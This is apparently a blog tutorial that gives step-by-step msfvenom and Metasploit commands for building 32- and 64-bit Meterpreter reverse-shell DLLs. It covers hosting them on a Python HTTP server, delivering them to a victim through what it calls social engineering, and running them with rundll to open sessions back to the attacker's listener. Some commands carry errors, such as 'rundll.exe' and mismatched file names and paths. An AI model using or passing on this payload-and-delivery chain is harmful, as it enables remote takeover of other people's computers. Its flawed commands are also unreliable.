Meterpreter shell as a 32 & 64 Bit DLL

A post on- How to get a Meterpreter Shell as a 32 and 64 Bit DLL?

We will be using System32 and SysWOW64 redirectors to run the DLL payloads and create a meterpreter shell.

Note: My IP ie., LHOST: 192.168.137.130 (Kali instance), LPORT: 9500, Victim’s IP ie., RHOST:192.168.137.132 (Windows 7 instance)

Follow the below steps:

1. Creating a payload using MSFVENOM :

For a 32 Bit DLL

Payload generation 32-Bit Dll

Use Commands:

msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=192.168.137.130 LPORT=9500 > reverse_32bit.dll

For a 64 Bit DLL

Payload generation 64-Bit Dll

Use Commands:

msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=192.168.137.130 LPORT=9500 > reverse_64bit.dll

Check both the files and transfer them using any Social Engineering Method to Victim’s System.

2. Transfering payloads to the victim using Social Engineering:

Here, I’m using a Simple Python HTTP Server to host the files and transfer them to the victim’s instance. Also, I’ve moved the above payloads into a folder named dll. Refer to below images:

To run a python HTTP server:

Use Commands: python -m SimpleHTTPServer

Starting a Python Server

Connect with the attacker server: 192.168.137.130:8000 using the victim’s browser. Download and save both the files on Desktop (for a Simplicity).

Transfer payloads to victim’s machine

Victim downloads the payload

3. Start a Reverse Handler on the attacker’s machine:

Here, we are starting a reverse TCP handler on the Kali, that will connect to the reverse shell instance from the Windows 7 machine.

Start a reverse TCP handler

Start msfconsole & Use Commands:

msf> use exploit/multi/handler

> set PAYLOAD windows/meterpreter/reverse_tcp

> set LHOST 192.168.137.130

> set LPORT 9500

> exploit

A reverse tcp handler is started.

4. Run the DLL as a meterpreter shell:

Open CMD on Windows 7

Use Commands:

C:Users/Windows7/>C:/Windows/SysWOW64/rundll.exe Desktop/reverse32_bit.dll

//nothing will execute, we need to pass a random parameter to the above dll

Victim/Attacker executes the payload

Use Commands: C:Users/Windows7/>C:/Windows/SysWOW64/rundll.exe Desktop/reverse32_bit.dll,xyz

5. Check the reverse tcp handler:

A meterpreter shell is created form the windows 7 to Kali instance.

Meterpreter Session created via 32-Bit Dll

Meterpreter Session

For a 64 Bit Instance:

Start a reverse handler for an x64 payload and use System32 in place of SysWOW64.

Start a reverse TCP Handler for x64

Use Commands: set PAYLOAD windows/x64/meterpreter/reverse_tcp

Victim/Attacker executes the payload

Use Commands: C:Users/Windows7/>C:/Windows/SysWOW64/rundll.exe Desktop/reverse64_bit.dll,xyz // SysWOW64 also works for a 64 bit DLL.

Meterpreter Session created via 64-Bit Dll

Check the handler a meterpreter session 2 has been created.

Meterpreter session

Change the SysWOW64 to System32:

Use Commands: C:Users/Windows7/>C:/Windows/System32/rundll.exe Desktop/reverse32_bit.dll,xyz

Victim/Attacker executes the payload

Check the handler a meterpreter session 3 has been created.

Meterpreter session

For more information on System Redirects refer to-

https://docs.microsoft.com/en-us/windows/win32/winprog64/file-system-redirector